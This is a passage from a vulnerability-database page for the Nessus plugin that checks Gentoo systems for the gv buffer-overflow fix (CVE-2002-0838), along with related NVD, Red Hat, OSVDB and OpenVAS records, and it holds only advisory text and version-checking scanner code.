Search...

GLSA-200408-10 : gv: Exploitable Buffer Overflow

2004-08-30T00:00:00

ID GENTOO_GLSA-200408-10.NASL
Type nessus
Reporter This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.
Modified 2004-08-30T00:00:00

Description

The remote host is affected by the vulnerability described in GLSA-200408-10 (gv: Exploitable Buffer Overflow)

gv contains a buffer overflow vulnerability where an unsafe sscanf() call
is used to interpret PDF and PostScript files.

Impact :

By enticing a user to view a malformed PDF or PostScript file an attacker
could execute arbitrary code with the permissions of the user running gv.

Workaround :

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of gv.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 200408-10.
#
# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike 
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(14566);
  script_version("1.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2002-0838");
  script_xref(name:"GLSA", value:"200408-10");

  script_name(english:"GLSA-200408-10 : gv: Exploitable Buffer Overflow");
  script_summary(english:"Checks for updated package(s) in /var/db/pkg");

  script_set_attribute(
    attribute:"synopsis", 
    value:
"The remote Gentoo host is missing one or more security-related
patches."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"The remote host is affected by the vulnerability described in GLSA-200408-10
(gv: Exploitable Buffer Overflow)

    gv contains a buffer overflow vulnerability where an unsafe sscanf() call
    is used to interpret PDF and PostScript files.
  
Impact :

    By enticing a user to view a malformed PDF or PostScript file an attacker
    could execute arbitrary code with the permissions of the user running gv.
  
Workaround :

    There is no known workaround at this time. All users are encouraged to
    upgrade to the latest available version of gv."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security.gentoo.org/glsa/200408-10"
  );
  script_set_attribute(
    attribute:"solution", 
    value:
"All gv users should upgrade to the latest version:
    # emerge sync
    # emerge -pv '&gt;=app-text/gv-3.5.8-r4'
    # emerge '&gt;=app-text/gv-3.5.8-r4'"
  );
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:gv");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2004/08/12");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/08/30");
  script_set_attribute(attribute:"vuln_publication_date", value:"2002/12/04");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
  script_family(english:"Gentoo Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

if (qpkg_check(package:"app-text/gv", unaffected:make_list("ge 3.5.8-r4"), vulnerable:make_list("le 3.5.8-r3"))) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_warning(port:0, extra:qpkg_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  tested = qpkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gv");
}

JSON Vulners Source

Initial Source

{"id": "GENTOO_GLSA-200408-10.NASL", "bulletinFamily": "scanner", "title": "GLSA-200408-10 : gv: Exploitable Buffer Overflow", "description": "The remote host is affected by the vulnerability described in GLSA-200408-10\n(gv: Exploitable Buffer Overflow)\n\n gv contains a buffer overflow vulnerability where an unsafe sscanf() call\n is used to interpret PDF and PostScript files.\n \nImpact :\n\n By enticing a user to view a malformed PDF or PostScript file an attacker\n could execute arbitrary code with the permissions of the user running gv.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version of gv.", "published": "2004-08-30T00:00:00", "modified": "2004-08-30T00:00:00", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/14566", "reporter": "This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.", "references": ["https://security.gentoo.org/glsa/200408-10"], "cvelist": ["CVE-2002-0838"], "type": "nessus", "lastseen": "2021-01-07T10:51:50", "edition": 24, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0838"]}, {"type": "redhat", "idList": ["RHSA-2002:211"]}, {"type": "osvdb", "idList": ["OSVDB:8650", "OSVDB:8651", "OSVDB:8649"]}, {"type": "openvas", "idList": ["OPENVAS:53734", "OPENVAS:53733", "OPENVAS:54640", "OPENVAS:53756"]}, {"type": "cert", "idList": ["VU:600777"]}, {"type": "exploitdb", "idList": ["EDB-ID:21871", "EDB-ID:21872"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:3627"]}, {"type": "debian", "idList": ["DEBIAN:DSA-182-1:BF38F", "DEBIAN:DSA-176-1:0B654", "DEBIAN:DSA-179-1:3F636"]}, {"type": "gentoo", "idList": ["GLSA-200408-10"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-179.NASL", "MANDRAKE_MDKSA-2002-069.NASL", "REDHAT-RHSA-2002-211.NASL", "DEBIAN_DSA-176.NASL", "DEBIAN_DSA-182.NASL", "MANDRAKE_MDKSA-2002-071.NASL"]}], "modified": "2021-01-07T10:51:50", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-01-07T10:51:50", "rev": 2}, "vulnersScore": 7.4}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200408-10.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14566);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2002-0838\");\n script_xref(name:\"GLSA\", value:\"200408-10\");\n\n script_name(english:\"GLSA-200408-10 : gv: Exploitable Buffer Overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200408-10\n(gv: Exploitable Buffer Overflow)\n\n gv contains a buffer overflow vulnerability where an unsafe sscanf() call\n is used to interpret PDF and PostScript files.\n \nImpact :\n\n By enticing a user to view a malformed PDF or PostScript file an attacker\n could execute arbitrary code with the permissions of the user running gv.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version of gv.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200408-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All gv users should upgrade to the latest version:\n # emerge sync\n # emerge -pv '>=app-text/gv-3.5.8-r4'\n # emerge '>=app-text/gv-3.5.8-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gv\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/gv\", unaffected:make_list(\"ge 3.5.8-r4\"), vulnerable:make_list(\"le 3.5.8-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gv\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "14566", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:gv"], "scheme": null}

{"cve": [{"lastseen": "2020-10-03T11:36:59", "description": "Buffer overflow in (1) gv 3.5.8 and earlier, (2) gvv 1.0.2 and earlier, (3) ggv 1.99.90 and earlier, (4) gnome-gv, and (5) kghostview in kdegraphics 2.2.2 and earlier, allows attackers to execute arbitrary code via a malformed (a) PDF or (b) PostScript file, which is processed by an unsafe call to sscanf.", "edition": 3, "cvss3": {}, "published": "2002-10-10T04:00:00", "title": "CVE-2002-0838", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2002-0838"], "modified": "2016-10-18T02:22:00", "cpe": ["cpe:/a:ghostview:ghostview:1.4.1", "cpe:/a:gv:gv:3.5.2", "cpe:/a:gv:gv:2.9.4", "cpe:/a:ghostview:ghostview:1.3", "cpe:/a:gv:gv:3.5.3", "cpe:/a:gv:gv:3.2.4", "cpe:/a:ggv:ggv:1.0.2", "cpe:/a:gv:gv:2.7b2", "cpe:/a:ghostview:ghostview:1.4", "cpe:/a:gv:gv:3.1.4", "cpe:/a:gv:gv:2.7b3", "cpe:/a:gv:gv:3.4.12", "cpe:/a:gv:gv:3.4.3", "cpe:/a:gv:gv:2.7b4", "cpe:/a:gv:gv:3.0.0", "cpe:/a:gv:gv:2.7b1", "cpe:/a:gv:gv:3.5.8", "cpe:/a:gv:gv:2.7b5", "cpe:/a:gv:gv:3.0.4", "cpe:/a:gv:gv:3.1.6", "cpe:/a:gv:gv:2.7.6", "cpe:/a:ghostview:ghostview:1.5", "cpe:/a:gv:gv:3.4.2"], "id": "CVE-2002-0838", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0838", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ghostview:ghostview:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ghostview:ghostview:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b5:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b2:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b3:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ghostview:ghostview:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.7b1:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:2.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:ghostview:ghostview:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:gv:gv:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ggv:ggv:1.0.2:*:*:*:*:*:*:*"]}], "redhat": [{"lastseen": "2019-08-13T18:45:10", "bulletinFamily": "unix", "cvelist": ["CVE-2002-0838"], "description": "Gv and ggv are user interfaces for the Ghostscript PostScript(R)\ninterpreter used to display PostScript and PDF documents on an X Window\nSystem. KGhostview is the PostScript viewer for the K Desktop Environment.\n\nZen Parse found a local buffer overflow in gv version 3.5.8 and earlier. \nAn attacker can create a carefully crafted malformed PDF or PostScript file\nin such a way that when that file is viewed arbitrary commands can be executed.\n\nggv and kghostview contain code derived from gv and therefore have the same\nvulnerability.\n\nAll users of gv, ggv, and kghostview are advised to upgrade to the errata\npackages which contain patches to correct the vulnerability.", "modified": "2018-03-14T19:26:26", "published": "2003-02-06T05:00:00", "id": "RHSA-2002:211", "href": "https://access.redhat.com/errata/RHSA-2002:211", "type": "redhat", "title": "(RHSA-2002:211) ggv security update", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2002-0838"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:12281](https://secuniaresearch.flexerasoftware.com/advisories/12281/)\n[Secunia Advisory ID:7163](https://secuniaresearch.flexerasoftware.com/advisories/7163/)\n[Related OSVDB ID: 8650](https://vulners.com/osvdb/OSVDB:8650)\n[Related OSVDB ID: 8649](https://vulners.com/osvdb/OSVDB:8649)\nRedHat RHSA: RHSA-2002:220\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200408-10.xml\nISS X-Force ID: 10201\n[CVE-2002-0838](https://vulners.com/cve/CVE-2002-0838)\nBugtraq ID: 5808\n", "modified": "2002-12-04T00:00:00", "published": "2002-12-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8651", "id": "OSVDB:8651", "type": "osvdb", "title": "ggv sscanf Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2002-0838"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:12281](https://secuniaresearch.flexerasoftware.com/advisories/12281/)\n[Secunia Advisory ID:7163](https://secuniaresearch.flexerasoftware.com/advisories/7163/)\n[Related OSVDB ID: 8649](https://vulners.com/osvdb/OSVDB:8649)\n[Related OSVDB ID: 8651](https://vulners.com/osvdb/OSVDB:8651)\nRedHat RHSA: RHSA-2002:220\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200408-10.xml\nISS X-Force ID: 10201\n[CVE-2002-0838](https://vulners.com/cve/CVE-2002-0838)\nBugtraq ID: 5808\n", "modified": "2002-12-04T00:00:00", "published": "2002-12-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8650", "id": "OSVDB:8650", "type": "osvdb", "title": "gvv sscanf Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:03", "bulletinFamily": "software", "cvelist": ["CVE-2002-0838"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:7163](https://secuniaresearch.flexerasoftware.com/advisories/7163/)\n[Secunia Advisory ID:12281](https://secuniaresearch.flexerasoftware.com/advisories/12281/)\n[Related OSVDB ID: 8650](https://vulners.com/osvdb/OSVDB:8650)\n[Related OSVDB ID: 8651](https://vulners.com/osvdb/OSVDB:8651)\nRedHat RHSA: RHSA-2002:220\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200408-10.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-08/0180.html\nISS X-Force ID: 10201\n[CVE-2002-0838](https://vulners.com/cve/CVE-2002-0838)\nBugtraq ID: 5808\n", "modified": "2002-12-04T00:00:00", "published": "2002-12-04T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:8649", "id": "OSVDB:8649", "type": "osvdb", "title": "gv sscanf Local Overflow", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "description": "The remote host is missing an update to gnome-gv\nannounced via advisory DSA 179-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53734", "href": "http://plugins.openvas.org/nasl.php?oid=53734", "type": "openvas", "title": "Debian Security Advisory DSA 179-1 (gnome-gv)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_179_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 179-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. The same code is present in gnome-gv. This problem\nis triggered by scanning the PostScript file and can be exploited by\nan attacker sending a malformed PostScript or PDF file. The attacker\nis able to cause arbitrary code to be run with the privileges of the\nvictim.\n\nThis problem has been fixed in version 1.1.96-3.1 for the current\nstable distribution (woody), in version 0.82-2.1 for the old stable\ndistribution (potato) and version 1.99.7-9 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your gnome-gv package.\";\ntag_summary = \"The remote host is missing an update to gnome-gv\nannounced via advisory DSA 179-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20179-1\";\n\nif(description)\n{\n script_id(53734);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 179-1 (gnome-gv)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gnome-gv\", ver:\"0.82-2.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gnome-gv\", ver:\"1.1.96-3.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "description": "The remote host is missing an update to gv\nannounced via advisory DSA 176-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53733", "href": "http://plugins.openvas.org/nasl.php?oid=53733", "type": "openvas", "title": "Debian Security Advisory DSA 176-1 (gv)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_176_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 176-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Zen-parse discovered a buffer overflow in gv, a PostScript and PDF\nviewer for X11. This problem is triggered by scanning the PostScript\nfile and can be exploited by an attacker sending a malformed\nPostScript or PDF file. The attacker is able to cause arbitrary code\nto be run with the privileges of the victim.\n\nThis problem has been fixed in version 3.5.8-26.1 for the current\nstable distribution (woody), in version 3.5.8-17.1 for the old stable\ndistribution (potato) and version 3.5.8-27 for the unstable\ndistribution (sid).\n\nWe recommend that you upgrade your gv package.\";\ntag_summary = \"The remote host is missing an update to gv\nannounced via advisory DSA 176-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20176-1\";\n\nif(description)\n{\n script_id(53733);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:24:46 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0838\");\n script_bugtraq_id(5808);\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 176-1 (gv)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"gv\", ver:\"3.5.8-17.1\", rls:\"DEB2.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"gv\", ver:\"3.5.8-26.1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200408-10.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54640", "href": "http://plugins.openvas.org/nasl.php?oid=54640", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200408-10 (gv)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"gv contains an exploitable buffer overflow that allows an attacker to\nexecute arbitrary code.\";\ntag_solution = \"All gv users should upgrade to the latest version:\n\n # emerge sync\n\n # emerge -pv '>=app-text/gv-3.5.8-r4'\n # emerge '>=app-text/gv-3.5.8-r4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200408-10\nhttp://bugs.gentoo.org/show_bug.cgi?id=59385\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200408-10.\";\n\n \n\nif(description)\n{\n script_id(54640);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(5808);\n script_cve_id(\"CVE-2002-0838\");\n script_tag(name:\"cvss_base\", value:\"4.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200408-10 (gv)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/gv\", unaffected: make_list(\"ge 3.5.8-r4\"), vulnerable: make_list(\"le 3.5.8-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-0838"], "description": "The remote host is missing an update to 